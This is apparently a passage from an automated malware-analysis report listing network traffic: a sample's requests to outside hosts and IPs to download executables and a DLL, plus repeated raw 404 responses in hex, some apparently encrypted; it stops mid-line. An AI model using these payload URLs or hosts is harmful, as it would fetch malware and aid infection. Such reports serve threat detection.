                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: GET /tratata.php HTTP/1.1Host: file-file-host4.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: file-file-host4.comCache-Control: no-cacheCookie: PHPSESSID=rd3dm5mqbrt7b88g82ka584gmv
                      Source: global trafficHTTP traffic detected: GET /files/6976_1640974830_4226.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /stlr/maps.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.243.44.128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1e b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:47 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 61 74 61 2d 68 6f 73 74 2d 63 6f 69 6e 2d 38 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 31 Dec 2021 18:21:54 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 30 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f6 e8 24 e5 64 50 06 b9 0d 0a 30 0d 0a 0d 0a Data Ascii: 30I:82OR&:UPJ$dP0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 31 Dec 2021 18:22:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not 